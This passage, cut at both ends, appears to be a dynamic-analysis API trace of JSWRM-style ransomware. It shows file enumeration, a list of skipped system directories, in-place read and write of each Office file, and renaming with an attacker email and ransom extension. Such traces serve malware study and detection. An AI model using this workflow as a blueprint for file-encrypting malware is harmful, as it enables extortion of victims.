(lpString1="MSTHED98.POC", lpString2=".") returned 1 [0142.222] lstrcmpiW (lpString1="MSTHED98.POC", lpString2="..") returned 1 [0142.222] lstrcmpiW (lpString1="MSTHED98.POC", lpString2="...") returned 1 [0142.222] lstrcmpiW (lpString1="MSTHED98.POC", lpString2="windows") returned -1 [0142.222] lstrcmpiW (lpString1="MSTHED98.POC", lpString2="recovery") returned -1 [0142.222] lstrcmpiW (lpString1="MSTHED98.POC", lpString2="perflogs") returned -1 [0142.222] lstrcmpiW (lpString1="MSTHED98.POC", lpString2="documents and settings") returned 1 [0142.222] lstrcmpiW (lpString1="MSTHED98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.222] lstrcmpiW (lpString1="MSTHED98.POC", lpString2="system volume information") returned -1 [0142.222] lstrcmpiW (lpString1="MSTHED98.POC", lpString2="msocache") returned 1 [0142.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSTHED98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSTHED98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSTHED98.POC", lpUsedDefaultChar=0x0) returned 12 [0142.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSTHED98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSTHED98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSTHED98.POC", lpUsedDefaultChar=0x0) returned 12 [0142.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MSTHED98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\msthed98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.223] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=133370) returned 1 [0142.223] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.223] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x208f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x208f0, lpOverlapped=0x0) returned 1 [0142.243] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.243] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x208f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x208f0, lpOverlapped=0x0) returned 1 [0142.244] CloseHandle (hObject=0x238) returned 1 [0142.244] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MSTHED98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\msthed98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MSTHED98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\msthed98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.245] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23382990, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23382990, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23382990, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1da0a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NAVBAR11.POC", cAlternateFileName="")) returned 1 [0142.245] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2=".") returned 1 [0142.245] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2="..") returned 1 [0142.245] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2="...") returned 1 [0142.245] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2="windows") returned -1 [0142.245] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2="recovery") returned -1 [0142.245] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2="perflogs") returned -1 [0142.245] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2="documents and settings") returned 1 [0142.245] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.246] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2="system volume information") returned -1 [0142.246] lstrcmpiW (lpString1="NAVBAR11.POC", lpString2="msocache") returned 1 [0142.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBAR11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBAR11.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAVBAR11.POC", lpUsedDefaultChar=0x0) returned 12 [0142.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBAR11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBAR11.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAVBAR11.POC", lpUsedDefaultChar=0x0) returned 12 [0142.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBAR11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbar11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.247] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=121354) returned 1 [0142.247] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.247] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1da00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1da00, lpOverlapped=0x0) returned 1 [0142.256] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.256] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1da00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1da00, lpOverlapped=0x0) returned 1 [0142.256] CloseHandle (hObject=0x238) returned 1 [0142.256] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBAR11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbar11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBAR11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbar11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.258] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23382990, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23382990, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233a8be5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ccde, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NAVBARV.POC", cAlternateFileName="")) returned 1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2=".") returned 1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2="..") returned 1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2="...") returned 1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2="windows") returned -1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2="recovery") returned -1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2="perflogs") returned -1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2="documents and settings") returned 1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2="system volume information") returned -1 [0142.258] lstrcmpiW (lpString1="NAVBARV.POC", lpString2="msocache") returned 1 [0142.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBARV.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBARV.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAVBARV.POC", lpUsedDefaultChar=0x0) returned 11 [0142.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBARV.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBARV.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAVBARV.POC", lpUsedDefaultChar=0x0) returned 11 [0142.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBARV.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbarv.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.259] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=117982) returned 1 [0142.259] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.259] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1ccd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1ccd0, lpOverlapped=0x0) returned 1 [0142.268] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.268] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1ccd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1ccd0, lpOverlapped=0x0) returned 1 [0142.268] CloseHandle (hObject=0x238) returned 1 [0142.268] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBARV.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbarv.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBARV.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbarv.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.269] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2303b5cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2303b5cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x230ade29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NAVBRPH1.POC", cAlternateFileName="")) returned 1 [0142.269] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2=".") returned 1 [0142.269] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2="..") returned 1 [0142.269] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2="...") returned 1 [0142.269] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2="windows") returned -1 [0142.269] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2="recovery") returned -1 [0142.269] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2="perflogs") returned -1 [0142.269] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2="documents and settings") returned 1 [0142.269] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.270] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2="system volume information") returned -1 [0142.270] lstrcmpiW (lpString1="NAVBRPH1.POC", lpString2="msocache") returned 1 [0142.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBRPH1.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBRPH1.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAVBRPH1.POC", lpUsedDefaultChar=0x0) returned 12 [0142.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBRPH1.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBRPH1.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAVBRPH1.POC", lpUsedDefaultChar=0x0) returned 12 [0142.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBRPH1.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbrph1.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.271] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=924) returned 1 [0142.271] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.271] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x390, lpOverlapped=0x0) returned 1 [0142.274] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.274] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x390, lpOverlapped=0x0) returned 1 [0142.275] CloseHandle (hObject=0x238) returned 1 [0142.275] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBRPH1.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbrph1.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBRPH1.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbrph1.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.276] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2303b5cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2303b5cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2303b5cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x396, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NAVBRPH2.POC", cAlternateFileName="")) returned 1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2=".") returned 1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2="..") returned 1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2="...") returned 1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2="windows") returned -1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2="recovery") returned -1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2="perflogs") returned -1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2="documents and settings") returned 1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2="system volume information") returned -1 [0142.277] lstrcmpiW (lpString1="NAVBRPH2.POC", lpString2="msocache") returned 1 [0142.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBRPH2.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBRPH2.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAVBRPH2.POC", lpUsedDefaultChar=0x0) returned 12 [0142.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBRPH2.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAVBRPH2.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAVBRPH2.POC", lpUsedDefaultChar=0x0) returned 12 [0142.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBRPH2.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbrph2.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.278] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=918) returned 1 [0142.278] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.278] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x390, lpOverlapped=0x0) returned 1 [0142.280] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.280] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x390, lpOverlapped=0x0) returned 1 [0142.280] CloseHandle (hObject=0x238) returned 1 [0142.280] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBRPH2.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbrph2.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NAVBRPH2.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\navbrph2.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.281] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23382990, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23382990, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233a8be5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9965a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NEWS.DPV", cAlternateFileName="")) returned 1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2=".") returned 1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2="..") returned 1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2="...") returned 1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2="windows") returned -1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2="recovery") returned -1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2="perflogs") returned -1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2="documents and settings") returned 1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2="$RECYCLE.BIN") returned 1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2="system volume information") returned -1 [0142.281] lstrcmpiW (lpString1="NEWS.DPV", lpString2="msocache") returned 1 [0142.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS.DPV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWS.DPV", lpUsedDefaultChar=0x0) returned 8 [0142.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS.DPV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, 